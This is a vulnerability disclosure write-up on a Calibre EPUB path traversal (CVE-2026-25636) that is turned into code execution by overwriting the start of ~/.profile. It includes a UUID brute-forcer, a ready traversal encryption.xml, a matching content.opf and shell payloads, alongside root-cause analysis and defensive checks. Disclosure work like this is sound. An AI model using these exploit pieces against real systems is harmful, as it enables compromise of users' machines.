CVE-2026-25636: From Ebook to Owned — Calibre EPUB Path Traversal to RCE

0x5t
Security Researcher
Team: RaptX
Tags: RCE, Path Traversal, Calibre  |  CVSS 8.0 HIGH
[Figure: attack chain diagram for CVE-2026-25636, Calibre EPUB path traversal to RCE]
TL;DR: A path traversal vulnerability in Calibre 9.1.0's EPUB conversion allows a malicious ebook to corrupt any file writable by the Calibre process on the victim's system. By targeting shell initialization scripts like ~/.profile and brute-forcing a UUID whose SHA-1 hash begins with a chosen XOR key, this file corruption can be weaponized into code execution. When the victim next logs in or sources their profile, an attacker-chosen command executes.

Vulnerability Chain: Path Traversal → Arbitrary File Corruption → Code Execution

Introduction

Calibre is one of the most popular ebook management applications, with millions of users worldwide. It handles various ebook formats, converts between them, and manages libraries. Given its widespread use and the fact that users regularly open ebooks from untrusted sources (online libraries, torrents, email attachments), any vulnerability in Calibre's file processing is worth investigating.

This writeup details a vulnerability I discovered in Calibre 9.1.0's EPUB processing that chains together several weaknesses to achieve code execution from a malicious ebook file.

The Discovery

While auditing Calibre's source code, I focused on the EPUB conversion pipeline. EPUBs are essentially ZIP archives containing XML metadata, XHTML content, and embedded resources like fonts and images. One interesting feature caught my attention: IDPF font obfuscation.

The IDPF (International Digital Publishing Forum) specification includes a method for "obfuscating" embedded fonts to prevent casual extraction. This isn't encryption—it's a simple XOR operation using the book's UUID as a key. Calibre implements this in src/calibre/ebooks/conversion/plugins/epub_input.py.

The vulnerability lies in how Calibre resolves the paths to these "encrypted" resources.

Technical Deep Dive

The Vulnerable Code

In epub_input.py, the process_encryption() function handles font decryption:

def process_encryption(self, encfile, opf, log):
    # ...
    for em in root.xpath('descendant::*[contains(name(), "EncryptionMethod")]'):
        cr = em.getparent().xpath('descendant::*[contains(name(), "CipherReference")]')[0]
        uri = cr.get('URI')  # Attacker-controlled from encryption.xml

        # LINE 75 - PATH TRAVERSAL
        path = os.path.abspath(os.path.join(os.path.dirname(encfile), '..', *uri.split('/')))

        if (tkey and os.path.exists(path)):
            decrypt_font(tkey, path, algorithm)  # LINE 79 - Corrupts the file

The critical issues:

  1. uri is extracted directly from META-INF/encryption.xml without any sanitization
  2. *uri.split('/') preserves .. path components
  3. os.path.abspath() resolves the traversal, escaping the EPUB's extraction directory
  4. decrypt_font() opens the resolved path in read-write mode and XORs its contents
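
The effect of that path expression can be reproduced in isolation. The sketch below mirrors the quoted line using posixpath so that it behaves the same on any host; the extraction directory and the font path are hypothetical values chosen only for illustration.

```python
import posixpath


def resolve_cipher_uri(encfile: str, uri: str) -> str:
    """Mirror the path expression quoted above, using POSIX path rules."""
    return posixpath.abspath(
        posixpath.join(posixpath.dirname(encfile), "..", *uri.split("/"))
    )


# Hypothetical extraction directory, chosen only for illustration.
encfile = "/tmp/calibre_extract/META-INF/encryption.xml"

benign = resolve_cipher_uri(encfile, "OEBPS/fonts/book.otf")
hostile = resolve_cipher_uri(encfile, "../../../../home/victim/.profile")

print(benign)   # /tmp/calibre_extract/OEBPS/fonts/book.otf
print(hostile)  # /home/victim/.profile
```

Surplus ".." components are harmless to the attacker: once normalization reaches the filesystem root, further ".." segments are simply dropped, which is why a long run of them works without knowing the depth of the extraction directory.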

The IDPF Obfuscation Algorithm

The decrypt_font() function implements IDPF's font obfuscation:

  1. Compute SHA1(UUID) where UUID is from the book's content.opf
  2. Use the resulting 20-byte SHA1 digest as the XOR key
  3. XOR the first 1040 bytes of the target file with this key (repeating the 20-byte key)

def decrypt_font(tkey, path, algorithm):
    # tkey = SHA1(UUID)[:20]
    with open(path, 'r+b') as f:
        data = f.read(1040)
        # XOR operation
        decrypted = bytes([data[i] ^ tkey[i % 20] for i in range(len(data))])
        f.seek(0)
        f.write(decrypted)

This means an attacker can:

  1. Use path traversal to target any file writable by Calibre
  2. XOR its first 1040 bytes with a key derived from a UUID the attacker controls
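
As a minimal in-memory model of this primitive (not Calibre's actual code), the sketch below derives a key from an identifier and applies the XOR to a byte string. The helper names idpf_key and xor_prefix are hypothetical, the identifier is a placeholder, and the whitespace stripping follows the EPUB font obfuscation specification; whether Calibre normalizes the identifier in exactly this way is an assumption.

```python
import hashlib
import re

OBFUSCATED_LEN = 1040  # number of leading bytes affected, per the description above


def idpf_key(identifier: str) -> bytes:
    """SHA-1 of the identifier with XML whitespace removed (a 20-byte key)."""
    stripped = re.sub(r"[\x20\x09\x0d\x0a]", "", identifier)
    return hashlib.sha1(stripped.encode("utf-8")).digest()


def xor_prefix(data: bytes, key: bytes) -> bytes:
    """XOR the first 1040 bytes with the repeating key; leave the rest alone."""
    head = bytes(b ^ key[i % len(key)] for i, b in enumerate(data[:OBFUSCATED_LEN]))
    return head + data[OBFUSCATED_LEN:]


# Placeholder identifier and sample file content, for illustration only.
key = idpf_key("urn:uuid:00000000-0000-0000-0000-000000000000")
original = b"# ~/.profile: example\n" * 100  # 2200 bytes
corrupted = xor_prefix(original, key)

print(corrupted[OBFUSCATED_LEN:] == original[OBFUSCATED_LEN:])  # tail is untouched
print(xor_prefix(corrupted, key) == original)  # applying the XOR twice restores the data
```

Two properties matter for exploitation: everything past byte 1040 is left intact, and the output bytes are fully determined by the original bytes and the key.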

Exploitation: From Corruption to Code Execution

At first glance, XOR corruption seems like a limited primitive. The corruption is deterministic but depends on both the original file content and the UUID. How do we turn this into code execution?

The Key Insight

If we know the original content of a target file, we can calculate what XOR key we need to produce a desired output:

required_key = original_content XOR desired_output

Then we brute-force UUIDs until we find one whose SHA1(UUID) starts with our required key bytes.

Target Selection: Shell Initialization Scripts

On Linux/macOS systems, shell initialization scripts like ~/.profile, ~/.bashrc, and ~/.bash_profile are executed when a user logs in or starts a shell. These files commonly start with predictable content:

# ~/.profile: executed by the command interpreter for login shells.

When the file starts with this stock header, its first 4 bytes are # ~/ (hex: 23 20 7e 2f).

Crafting the Payload

I chose two payloads to demonstrate the vulnerability:

Payload 1: id;# - Executes the id command

  • Target bytes: # ~/ → id;#
  • Hex: 23 20 7e 2f → 69 64 3b 23
  • Required XOR key: 4a 44 45 0c

Payload 2: sh;# - Spawns an interactive shell

  • Target bytes: # ~/ → sh;#
  • Hex: 23 20 7e 2f → 73 68 3b 23
  • Required XOR key: 50 48 45 0c

The trailing # is crucial: it turns the rest of the XOR-corrupted first line into a comment, so the shell does not try to parse the garbage bytes that follow as part of the command.
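
The two keys can be re-derived with a few lines of Python. This is a small sketch of the XOR relation from "The Key Insight"; the function name required_key is hypothetical.

```python
def required_key(original: bytes, desired: bytes) -> bytes:
    """Return the key bytes that turn `original` into `desired` under XOR."""
    if len(original) != len(desired):
        raise ValueError("original and desired must have the same length")
    return bytes(a ^ b for a, b in zip(original, desired))


original = b"# ~/"  # first four bytes of the stock ~/.profile header
for payload in (b"id;#", b"sh;#"):
    print(payload.decode(), required_key(original, payload).hex(" "))
# id;# 4a 44 45 0c
# sh;# 50 48 45 0c
```

Only these four key bytes need to match; the remaining 16 bytes of the SHA1 digest are left to chance, which is why everything after the payload is garbage.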

Brute-Forcing the UUID

I wrote a multi-threaded C brute-forcer to find UUIDs whose SHA1 hash starts with the required bytes:

// Target key bytes for sh;# payload
static const uint8_t TARGET_KEY[4] = {0x50, 0x48, 0x45, 0x0c};

void *worker(void *arg) {
    // ...
    while (!found && val < 0x100000000ULL) {
        snprintf(uuid_str, sizeof(uuid_str),
                 "urn:uuid:%08lx-0000-0000-0000-000000000000", val);

        sha1((uint8_t *)uuid_str, 45, sha1_result);

        if (sha1_result[0] == TARGET_KEY[0] &&
            sha1_result[1] == TARGET_KEY[1] &&
            sha1_result[2] == TARGET_KEY[2] &&
            sha1_result[3] == TARGET_KEY[3]) {
            found = 1;
            // Winner!
        }
        val += num_workers;
    }
    return NULL;  // pthread start routines must return a void *
}

On a 12-core CPU, finding a 4-byte match takes approximately 2-4 minutes.
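
For readers who prefer Python, the same search loop can be sketched in a few lines. This is far slower than the C version and is meant only to show the logic; find_identifier is a hypothetical name, and the demo uses a one-byte prefix so that it finishes instantly.

```python
import hashlib
from typing import Optional


def find_identifier(prefix: bytes, limit: int = 1 << 32) -> Optional[str]:
    """Return the first candidate identifier whose SHA-1 digest starts with `prefix`."""
    for val in range(limit):
        candidate = f"urn:uuid:{val:08x}-0000-0000-0000-000000000000"
        digest = hashlib.sha1(candidate.encode("ascii")).digest()
        if digest.startswith(prefix):
            return candidate
    return None  # no match inside the searched range


# One-byte demo prefix; a real 4-byte search needs on the order of 2**32 hashes.
hit = find_identifier(b"\x50", limit=100_000)
print(hit)
```

Because the candidate space here is also 2^32 values, a given 4-byte target is likely but not guaranteed to have a match inside it; varying another field of the UUID extends the search if the first pass comes up empty.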

Results:

[+] FOUND: urn:uuid:cf0909a3-0000-0000-0000-000000000000
    SHA1: 4a44450c... (for id;# payload)

[+] FOUND: urn:uuid:ef9a993a-0000-0000-0000-000000000000
    SHA1: 5048450c... (for sh;# payload)

Building the Malicious EPUB

An EPUB is a ZIP archive with a specific structure:

malicious.epub
├── mimetype                    # Must be first, uncompressed
├── META-INF/
│   ├── container.xml           # Points to content.opf
│   └── encryption.xml          # Contains path traversal payload
└── OEBPS/
    ├── content.opf             # Contains our magic UUID
    └── ch.xhtml                # Minimal chapter content

The Path Traversal Payload (encryption.xml)

<?xml version="1.0" encoding="UTF-8"?>
<encryption xmlns="urn:oasis:names:tc:opendocument:xmlns:container"
            xmlns:enc="http://www.w3.org/2001/04/xmlenc#">
  <enc:EncryptedData>
    <enc:EncryptionMethod Algorithm="http://www.idpf.org/2008/embedding"/>
    <enc:CipherData>
      <enc:CipherReference URI="../../../../../../../../../../home/victim/.profile"/>
    </enc:CipherData>
  </enc:EncryptedData>
</encryption>
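
From the defensive side, a file like this is easy to flag before it reaches a converter. The following is a rough sketch, not a complete validator: suspicious_cipher_uris is a hypothetical helper that reports CipherReference URIs that are absolute or contain ".." segments. It uses the standard-library XML parser, which is an assumption of convenience; a hardened parser may be preferable for untrusted input.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List


def suspicious_cipher_uris(epub_bytes: bytes) -> List[str]:
    """Return CipherReference URIs that are absolute or contain '..' segments."""
    with zipfile.ZipFile(io.BytesIO(epub_bytes)) as zf:
        if "META-INF/encryption.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("META-INF/encryption.xml"))

    flagged = []
    for elem in root.iter():
        # Compare local names so the check does not depend on namespace prefixes.
        if elem.tag.rsplit("}", 1)[-1] != "CipherReference":
            continue
        uri = elem.get("URI", "")
        segments = uri.replace("\\", "/").split("/")
        if uri.startswith("/") or ".." in segments:
            flagged.append(uri)
    return flagged
```

Calling suspicious_cipher_uris(open("book.epub", "rb").read()) on a well-formed EPUB with embedded fonts should return an empty list, while the payload above would be reported.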

The Magic UUID (content.opf)

<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="2.0">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title>Innocent Book</dc:title>
    <dc:identifier id="uid">urn:uuid:ef9a993a-0000-0000-0000-000000000000</dc:identifier>
  </metadata>
  ...
</package>

The Attack in Action

Step 1: Victim Receives Malicious EPUB

The attacker distributes the malicious EPUB through any channel—email attachment, file sharing, ebook piracy sites, or even compromised legitimate sources.

Step 2: Victim Converts the EPUB

The victim uses Calibre to convert the ebook, either through the GUI ("Convert books") or the CLI (ebook-convert):

$ ebook-convert malicious.epub output.mobi

Step 3: File Corruption Occurs

During conversion, Calibre parses encryption.xml, resolves the traversal path to /home/victim/.profile, and XORs the first 1040 bytes.

Before:

# ~/.profile: executed by the command interpreter for login shells.

After:

sh;#<garbage bytes>

Step 4: Code Execution on Next Login

When the corrupted ~/.profile is sourced, sh;# is interpreted as a command, spawning an interactive shell. The # comments out the garbage bytes.

Impact Analysis

Direct Impacts

  1. Code Execution: An attacker-chosen command (limited in length by the brute-force cost) executes in the user's shell context
  2. Persistence: The corruption persists across reboots until manually fixed
  3. System Instability: Broken initialization scripts cause environment issues

Exploitation Constraints

  • Target file must exist and be writable by Calibre
  • Target file must have predictable first N bytes
  • Brute-force time increases exponentially with payload length:
    • 4 bytes: ~2-4 minutes
    • 5 bytes: ~10-17 hours
    • 6+ bytes: months or longer at the same hash rate (each extra byte multiplies the search by 256)
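
The scaling can be checked with simple arithmetic. The sketch below extrapolates from the measured 4-byte figure (2-4 minutes on a 12-core CPU), assuming the hash rate stays constant and that each extra key byte multiplies the expected work by 256; estimate_seconds is a hypothetical helper.

```python
def estimate_seconds(prefix_bytes: int, seconds_for_four: float) -> float:
    """Scale a measured 4-byte search time by 256 per additional byte."""
    return seconds_for_four * 256 ** (prefix_bytes - 4)


for n in (4, 5, 6):
    low = estimate_seconds(n, 2 * 60)   # lower bound: 2 minutes for 4 bytes
    high = estimate_seconds(n, 4 * 60)  # upper bound: 4 minutes for 4 bytes
    print(f"{n} bytes: {low / 3600:.1f} to {high / 3600:.1f} hours")
```

On this extrapolation a 5-byte match lands at roughly 8.5 to 17 hours and a 6-byte match at roughly 91 to 182 days on the same hardware; faster hardware shortens these figures proportionally.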

Platform Testing

Platform | Interface | Status
Linux | CLI (ebook-convert) | Vulnerable
Windows | GUI (Convert books) | Vulnerable

Root Cause Analysis

  1. Missing Input Validation: The URI attribute from encryption.xml is used directly without sanitization
  2. No Path Containment: Calibre doesn't verify that resolved paths remain within the EPUB extraction directory
  3. Unnecessary Write Access: The "decryption" operation opens files in read-write mode
  4. Trust in Untrusted Data: EPUB files from untrusted sources are processed with full privileges
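
A containment check of the kind the second point calls for can be sketched as follows. This is an illustration of the general technique, not the vendor's actual patch; resolve_inside is a hypothetical helper, and it assumes the extraction directory itself is trusted.

```python
import os


def resolve_inside(base_dir: str, uri: str) -> str:
    """Resolve `uri` under `base_dir`, refusing anything that escapes it."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *uri.split("/")))
    # commonpath compares whole path components, so /tmp/ab is not "inside" /tmp/a.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"URI escapes extraction directory: {uri!r}")
    return candidate
```

Using realpath rather than abspath also resolves symlinks, so a link planted inside the archive cannot be used to step outside the extraction directory. A caller would wrap the font-processing step in a try/except and skip any resource that raises.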

Timeline

Date | Event
2025-02-01 | Vulnerability discovered
2025-02-01 | Code execution escalation confirmed
2026-02-06 | Vendor patch release
2026-02-06 | Public disclosure

Conclusion

This vulnerability demonstrates how a seemingly limited primitive (XOR file corruption) can be escalated to code execution through careful target selection and cryptographic brute-forcing. The attack requires user interaction (converting an ebook), but given Calibre's widespread use and the common practice of converting ebooks from untrusted sources, the real-world risk is significant.

The vulnerable code sits in the EPUB input plugin used by the conversion pipeline, and the issue was confirmed through the CLI on Linux and the GUI on Windows, making it a cross-platform threat. Users should update Calibre immediately.

Acknowledgments

Shoutout to Civiled for walking me through reversing the IDPF encryption algorithm. Figuring out how to weaponize the XOR corruption into controlled output felt like a real-life CTF challenge.
